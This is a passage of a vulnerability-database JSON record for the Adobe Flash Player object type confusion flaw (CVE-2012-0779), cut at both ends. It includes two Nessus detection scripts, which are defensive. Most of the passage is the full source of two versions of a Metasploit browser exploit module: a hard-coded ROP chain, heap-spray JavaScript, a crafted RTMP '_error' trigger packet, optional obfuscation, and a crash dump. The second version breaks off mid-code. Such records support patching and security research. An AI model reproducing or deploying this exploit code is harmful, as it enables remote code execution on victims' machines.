Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"flash-player-11.2.202.235-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"flash-player-11.2.202.235-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:16:53", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201206-21 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could entice a user to open a specially crafted SWF file, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-07-11T00:00:00", "id": "GENTOO_GLSA-201206-21.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=59674", "published": "2012-06-25T00:00:00", "title": "GLSA-201206-21 : Adobe Flash Player: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201206-21.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59674);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n\n script_cve_id(\"CVE-2012-0779\", \"CVE-2012-2034\", \"CVE-2012-2035\", \"CVE-2012-2036\", \"CVE-2012-2037\", \"CVE-2012-2038\", \"CVE-2012-2039\", \"CVE-2012-2040\");\n script_xref(name:\"GLSA\", value:\"201206-21\");\n\n script_name(english:\"GLSA-201206-21 : Adobe Flash Player: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201206-21\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted SWF\n file, possibly resulting in execution of arbitrary code with the\n privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201206-21\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-11.2.202.236'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.236\"), vulnerable:make_list(\"lt 11.2.202.236\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:12", "bulletinFamily": "exploit", "description": "", "modified": "2012-06-23T00:00:00", "published": "2012-06-23T00:00:00", "href": "https://packetstormsecurity.com/files/114107/Adobe-Flash-Player-Object-Type-Confusion.html", "id": "PACKETSTORM:114107", "type": "packetstorm", "title": "Adobe Flash Player Object Type Confusion", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::BrowserAutopwn \n \nautopwn_info({ \n:os_name => OperatingSystems::WINDOWS, \n:ua_name => HttpClients::IE, \n:ua_minver => \"6.0\", \n:ua_maxver => \"8.0\", \n:method => \"GetVariable\", \n:classid => \"ShockwaveFlash.ShockwaveFlash\", \n:rank => NormalRanking, # reliable memory corruption \n:javascript => true \n}) \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Adobe Flash Player Object Type Confusion\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Adobe Flash \nPlayer. By supplying a corrupt AMF0 \"_error\" response, it \nis possible to gain arbitrary remote code execution under \nthe context of the user. \n \nThis vulnerability has been exploited in the wild as part of \nthe \"World Uyghur Congress Invitation.doc\" e-mail attack. \nAccording to the advisory, 10.3.183.19 and 11.x before \n11.2.202.235 are affected. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-0779' ], \n[ 'OSVDB', '81656'], \n[ 'BID', '53395' ], \n[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-09.html'], # Patch info \n[ 'URL', 'http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html' ] \n], \n'Payload' => \n{ \n#'Space' => 1024, \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Flash Player 11.2.202.228 \n[ 'Automatic', {} ], \n[ \n'IE 6 on Windows XP SP3', \n{ \n'Rop' => nil, \n'RandomHeap' => false, \n'Offset' => '0x0' \n} \n], \n[ \n'IE 7 on Windows XP SP3', \n{ \n'Rop' => nil, \n'RandomHeap' => false, \n'Offset' => '0x0' \n} \n], \n[ \n'IE 8 on Windows XP SP3 with msvcrt ROP', \n{ \n'Rop' => :msvcrt, \n'RandomHeap' => false, \n'Offset' => '238', \n'StackPivot' => 0x77c12100, # add esp, edx # retn 77 # from msvcrt.dll \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => \"May 04 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]), \nOptAddress.new('RTMPHOST', [ true, \"The local host to RTMP service listen on. This must be an address on the local machine or 0.0.0.0\", '0.0.0.0' ]), \nOptPort.new('RTMPPORT', [ true, \"The local port to RTMP service listen on.\", 1935 ]), \n], self.class \n) \n \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nif agent =~ /NT 5\\.1/ and agent =~ /MSIE 6/ \nreturn targets[1] #IE 6 on Windows XP SP3 \nelsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7/ \nreturn targets[2] #IE 7 on Windows XP SP3 \nelsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/ \nreturn targets[3] #IE 8 on Windows XP SP3 \nelse \nreturn nil \nend \nend \n \ndef junk(n=4) \nreturn rand_text_alpha(n).unpack(\"V\").first \nend \n \ndef nop \nreturn make_nops(4).unpack(\"V\").first \nend \n \ndef ret(t) \nreturn [ 0x77c4ec01 ].pack(\"V\") # RETN (ROP NOP) # msvcrt.dll \nend \n \ndef popret(t) \nreturn [ 0x77c4ec00 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcrt.dll \nend \n \ndef get_rop_chain(t) \n \n# ROP chains generated by mona.py - See corelan.be \nprint_status(\"Using msvcrt ROP\") \nrop = \n[ \n0x77c4e392, # POP EAX # RETN \n0x77c11120, # <- *&VirtualProtect() \n0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN \njunk, \n0x77c2dd6c, \n0x77c4ec00, # POP EBP # RETN \n0x77c35459, # ptr to 'push esp # ret' \n0x77c47705, # POP EBX # RETN \n0x00001000, # EBX \n0x77c3ea01, # POP ECX # RETN \n0x77c5d000, # W pointer (lpOldProtect) (-> ecx) \n0x77c46100, # POP EDI # RETN \n0x77c46101, # ROP NOP (-> edi) \n0x77c4d680, # POP EDX # RETN \n0x00000040, # newProtect (0x40) (-> edx) \n0x77c4e392, # POP EAX # RETN \nnop, # NOPS (-> eax) \n0x77c12df9, # PUSHAD # RETN \n].pack(\"V*\") \n \ncode = ret(t) \ncode << rand_text(119) \ncode << rop \ncode << \"\\xbc\\x0c\\x0c\\x0c\\x0c\" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem \ncode << payload.encoded \noffset = 2616 - code.length \ncode << rand_text(offset) \ncode << [ t['StackPivot'] ].pack(\"V\") \nreturn code \nend \n \ndef get_easy_spray(t, js_code, js_nops) \n \nspray = <<-JS \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \n \nwhile (nops.length < 0x80000) nops += nops; \n \nvar offset = nops.substring(0, #{t['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \n \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \n \n \nheap_obj.gc(); \nfor (var z=1; z < 0x185; z++) { \nheap_obj.alloc(block); \n} \n \nJS \n \nreturn spray \n \nend \n \n \ndef get_aligned_spray(t, js_rop, js_nops) \n \nspray = <<-JS \n \nvar heap_obj = new heapLib.ie(0x20000); \nvar nops = unescape(\"#{js_nops}\"); \nvar rop_chain = unescape(\"#{js_rop}\"); \n \nwhile (nops.length < 0x80000) nops += nops; \n \nvar offset = nops.substring(0, #{t['Offset']}); \nvar shellcode = offset + rop_chain + nops.substring(0, 0x800-offset.length-rop_chain.length); \n \n \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \n \n \nheap_obj.gc(); \nfor (var z=1; z < 0x1c5; z++) { \nheap_obj.alloc(block); \n} \n \nJS \n \nreturn spray \n \nend \n \ndef exploit \n@swf = create_swf \n \n# Boilerplate required to handled pivoted listeners \ncomm = datastore['ListenerComm'] \nif comm == \"local\" \ncomm = ::Rex::Socket::Comm::Local \nelse \ncomm = nil \nend \n \n@rtmp_listener = Rex::Socket::TcpServer.create( \n'LocalHost' => datastore['RTMPHOST'], \n'LocalPort' => datastore['RTMPPORT'], \n'Comm' => comm, \n'Context' => { \n'Msf' => framework, \n'MsfExploit' => self, \n} \n) \n \n# Register callbacks \n@rtmp_listener.on_client_connect_proc = Proc.new { |cli| \nadd_socket(cli) \nprint_status(\"#{cli.peerhost.ljust(16)} #{self.shortname} - Connected to RTMP\") \non_rtmp_connect(cli) \n} \n \n@rtmp_listener.start \n \nsuper \nend \n \ndef my_read(cli,size,timeout=nil) \nif timeout.nil? \ntimeout = cli.def_read_timeout \nend \n \nbuf = \"\" \n::Timeout::timeout(timeout) { \nwhile buf.length < size \nbuf << cli.get_once(size - buf.length) \nend \n} \nbuf \nend \n \ndef do_handshake(cli) \nc0 = my_read(cli, 1) \nc1 = my_read(cli, 1536) # HandshakeSize => 1536 \ns0 = \"\\3\" # s0 \ns1 = Rex::Text.rand_text(4) # s1.time \ns1 << \"\\x00\\x00\\x00\\x00\" # s1.zero \ns1 << Rex::Text.rand_text(1528) # s1.random_data \ns2 = c1 # s2 \ncli.put(s0) \ncli.put(s1) \ncli.put(s2) \nc2 = my_read(cli, 1536) # C2 (HandshakeSize => 1536) \nend \n \ndef on_rtmp_connect(cli) \n \nbegin \ndo_handshake(cli) \nrequest = my_read(cli, 341) # connect request length \n \ncase request \nwhen /connect/ \nrtmp_header = \"\\x03\" # Chunk Stream ID \nrtmp_header << \"\\x00\\x00\\x00\" # Timestamp \nrtmp_header << \"\\x00\\x00\\x71\" # Body Size \nrtmp_header << \"\\x14\" # AMF0 Command \nrtmp_header << \"\\x00\\x00\\x00\\x00\" # Stream ID \n \n# String \nrtmp_body = \"\\x02\" # String \nrtmp_body << \"\\x00\\x06\" # String length \nrtmp_body << \"\\x5f\\x65\\x72\\x72\\x6f\\x72\" # String: _error \n# Number \nrtmp_body << \"\\x00\" # AMF Type: Number \nrtmp_body << \"\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" # Number \n# Array \nrtmp_body << \"\\x0a\" # AMF Type: Array \nrtmp_body << \"\\x00\\x00\\x00\\x05\" # Array length: 5 \n# Array elements \nrtmp_body << \"\\x00\" # AMF Type: Number \nrtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number \nrtmp_body << \"\\x00\" # AMF Type: Number \nrtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number \nrtmp_body << \"\\x00\" # AMF Type: Number \nrtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number \nrtmp_body << \"\\x00\" # AMF Type: Number \nrtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number \nrtmp_body << \"\\x00\" # AMF Type: Number \nrtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number \n# Crafter Number \nrtmp_body << \"\\x00\" # AMF Type: Number \nrtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x0c\\x0c\\x0c\\x0c\" # Modify the \"\\x0c\\x0c\\x0c\\x0c\" to do an arbitrary call \n# Number \nrtmp_body << \"\\x00\" # AMF Type: Number \nrtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number \n# Number \nrtmp_body << \"\\x00\" # AMF Type: Number \nrtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number \n# Number \nrtmp_body << \"\\x00\" # AMF Type: Number \nrtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number \n# Number \nrtmp_body << \"\\x00\" # AMF Type: Number \nrtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number \n \ntrigger = rtmp_header \ntrigger << rtmp_body \n \ncli.put(trigger) \n@rtmp_listener.close_client(cli) \nend \nrescue \nensure \n@rtmp_listener.close_client(cli) \nremove_socket(cli) \nend \n \nend \n \ndef cleanup \nsuper \nreturn if not @rtmp_listener \n \nbegin \n@rtmp_listener.deref if @rtmp_listener.kind_of?(Rex::Service) \nif @rtmp_listener.kind_of?(Rex::Socket) \n@rtmp_listener.close \n@rtmp_listener.stop \nend \n@rtmp_listener = nil \nrescue ::Exception \nend \nend \n \ndef on_request_uri(cli, request) \n \nagent = request.headers['User-Agent'] \nmy_target = get_target(agent) \n \n# Avoid the attack if the victim doesn't have the same setup we're targeting \nif my_target.nil? \nprint_error(\"Browser not supported: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nprint_status(\"Client requesting: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status(\"Sending Exploit SWF\") \nsend_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' }) \nreturn \nend \n \np = payload.encoded \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) \njs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(my_target.arch)) \n \nif not my_target['Rop'].nil? \njs_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch)) \njs = get_aligned_spray(my_target, js_rop, js_nops) \nelse \njs = get_easy_spray(my_target, js_code, js_nops) \nend \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nswf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource \nswf_uri << \"/#{rand_text_alpha(rand(6)+3)}.swf\" \n \nif datastore['RTMPHOST'] == '0.0.0.0' \nrtmp_host = Rex::Socket.source_address('1.2.3.4') \nelse \nrtmp_host = datastore['RTMPHOST'] \nend \n \nrtmp_port = datastore['RTMPPORT'] \n \nhtml = %Q| \n<html> \n<head> \n<script> \n#{js} \n</script> \n</head> \n<body> \n<center> \n<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" \nid=\"test\" width=\"1\" height=\"1\" \ncodebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\"> \n<param name=\"movie\" value=\"#{swf_uri}\" /> \n<param name=\"FlashVars\" value=\"var1=#{rtmp_host}&var2=#{rtmp_port}\" \n<embed src=\"#{swf_uri}\" quality=\"high\" \nwidth=\"1\" height=\"1\" name=\"test\" align=\"middle\" \nallowNetworking=\"all\" \ntype=\"application/x-shockwave-flash\" \npluginspage=\"http://www.macromedia.com/go/getflashplayer\" \nFlashVars=\"var1=#{rtmp_host}&var2=#{rtmp_port}\"> \n</embed> \n \n</object> \n</center> \n \n</body> \n</html> \n| \n \nhtml = html.gsub(/^\\t\\t/, '') \n \nprint_status(\"Sending html\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \ndef create_swf \npath = ::File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2012-0779.swf\" ) \nfd = ::File.open( path, \"rb\" ) \nswf = fd.read(fd.stat.size) \nfd.close \n \nreturn swf \nend \n \nend \n \n=begin \n \n* Flash Player 11.2.202.228 \n \n(348.540): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=02dbac01 ebx=0013e2e4 ecx=02dbac10 edx=44444444 esi=02dbac11 edi=00000000 \neip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0 nv up ei pl nz na po nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202 \nFlash32_11_2_202_228!DllUnregisterServer+0x300e84: \n104b1b2d 8b422c mov eax,dword ptr [edx+2Ch] \nds:0023:44444470=???????? \n \n0:000> u eip \nFlash32_11_2_202_228!DllUnregisterServer+0x300e84: \n104b1b2d 8b422c mov eax,dword ptr [edx+2Ch] \n104b1b30 53 push ebx \n104b1b31 ffd0 call eax \n \n=end \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/114107/adobe_flash_rtmp.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-10-21T23:46:41", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 \"_error\" response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the \"World Uyghur Congress Invitation.doc\" e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.\n", "modified": "2017-10-05T21:44:36", "published": "2012-06-22T22:21:18", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASH_RTMP", "href": "", "type": "metasploit", "title": "Adobe Flash Player Object Type Confusion", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n\n autopwn_info({\n :os_name => OperatingSystems::Match::WINDOWS,\n :ua_name => HttpClients::IE,\n :ua_minver => \"6.0\",\n :ua_maxver => \"8.0\",\n :method => \"GetVariable\",\n :classid => \"ShockwaveFlash.ShockwaveFlash\",\n :rank => NormalRanking, # reliable memory corruption\n :javascript => true\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Adobe Flash Player Object Type Confusion\",\n 'Description' => %q{\n This module exploits a vulnerability found in Adobe Flash\n Player. By supplying a corrupt AMF0 \"_error\" response, it\n is possible to gain arbitrary remote code execution under\n the context of the user.\n\n This vulnerability has been exploited in the wild as part of\n the \"World Uyghur Congress Invitation.doc\" e-mail attack.\n According to the advisory, 10.3.183.19 and 11.x before\n 11.2.202.235 are affected.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-0779' ],\n [ 'OSVDB', '81656'],\n [ 'BID', '53395' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-09.html'], # Patch info\n [ 'URL', 'http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html' ],\n [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability' ]\n ],\n 'Payload' =>\n {\n #'Space' => 1024,\n 'BadChars' => \"\\x00\"\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Flash Player 11.2.202.228\n [ 'Automatic', {} ],\n [\n 'IE 6 on Windows XP SP3',\n {\n 'Rop' => nil,\n 'RandomHeap' => false,\n 'Offset' => '0x0'\n }\n ],\n [\n 'IE 7 on Windows XP SP3',\n {\n 'Rop' => nil,\n 'RandomHeap' => false,\n 'Offset' => '0x0'\n }\n ],\n [\n 'IE 8 on Windows XP SP3 with msvcrt ROP',\n {\n 'Rop' => :msvcrt,\n 'RandomHeap' => false,\n 'Offset' => '238',\n 'StackPivot' => 0x77c12100, # add esp, edx # retn 77 # from msvcrt.dll\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 04 2012\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),\n OptAddress.new('RTMPHOST', [ true, \"The local host to RTMP service listen on. This must be an address on the local machine or 0.0.0.0\", '0.0.0.0' ]),\n OptPort.new('RTMPPORT', [ true, \"The local port to RTMP service listen on.\", 1935 ]),\n ], self.class\n )\n\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6/\n return targets[1] #IE 6 on Windows XP SP3\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7/\n return targets[2] #IE 7 on Windows XP SP3\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\n return targets[3] #IE 8 on Windows XP SP3\n else\n return nil\n end\n end\n\n def ret(t)\n return [ 0x77c4ec01 ].pack(\"V\") # RETN (ROP NOP) # msvcrt.dll\n end\n\n def get_rop_chain(t)\n print_status(\"Using msvcrt ROP\")\n p = \"\\xbc\\x0c\\x0c\\x0c\\x0c\" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem\n p << payload.encoded\n\n code = ret(t)\n code << rand_text(119)\n code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})\n offset = 2616 - code.length\n code << rand_text(offset)\n code << [ t['StackPivot'] ].pack(\"V\")\n return code\n end\n\n def get_easy_spray(t, js_code, js_nops)\n randnop = rand_text_alpha(rand(100) + 1)\n\n spray = <<-JS\n var heap_obj = new heapLib.ie(0x20000);\n var code = unescape(\"#{js_code}\");\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n\n while (nops.length < 0x80000) nops += nops;\n\n var offset = nops.substring(0, #{t['Offset']});\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\n\n while (shellcode.length < 0x40000) shellcode += shellcode;\n var block = shellcode.substring(0, (0x80000-6)/2);\n\n\n heap_obj.gc();\n for (var z=1; z < 0x185; z++) {\n heap_obj.alloc(block);\n }\n\n JS\n\n return spray\n\n end\n\n\n def get_aligned_spray(t, js_rop, js_nops)\n randnop = rand_text_alpha(rand(100) + 1)\n\n spray = <<-JS\n\n var heap_obj = new heapLib.ie(0x20000);\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n var rop_chain = unescape(\"#{js_rop}\");\n\n while (nops.length < 0x80000) nops += nops;\n\n var offset = nops.substring(0, #{t['Offset']});\n var shellcode = offset + rop_chain + nops.substring(0, 0x800-offset.length-rop_chain.length);\n\n\n while (shellcode.length < 0x40000) shellcode += shellcode;\n var block = shellcode.substring(0, (0x80000-6)/2);\n\n\n heap_obj.gc();\n for (var z=1; z < 0x1c5; z++) {\n heap_obj.alloc(block);\n }\n\n JS\n\n return spray\n\n end\n\n def exploit\n @swf = create_swf\n\n # Boilerplate required to handled pivoted listeners\n comm = datastore['ListenerComm']\n if comm == \"local\"\n comm = ::Rex::Socket::Comm::Local\n else\n comm = nil\n end\n\n @rtmp_listener = Rex::Socket::TcpServer.create(\n 'LocalHost' => datastore['RTMPHOST'],\n 'LocalPort' => datastore['RTMPPORT'],\n 'Comm' => comm,\n 'Context' => {\n 'Msf' => framework,\n 'MsfExploit' => self,\n }\n )\n\n # Register callbacks\n @rtmp_listener.on_client_connect_proc = Proc.new { |cli|\n add_socket(cli)\n print_status(\"#{cli.peerhost.ljust(16)} #{self.shortname} - Connected to RTMP\")\n on_rtmp_connect(cli)\n }\n\n @rtmp_listener.start\n\n super\n end\n\n def my_read(cli,size,timeout=nil)\n if timeout.nil?\n timeout = cli.def_read_timeout\n end\n\n buf = \"\"\n 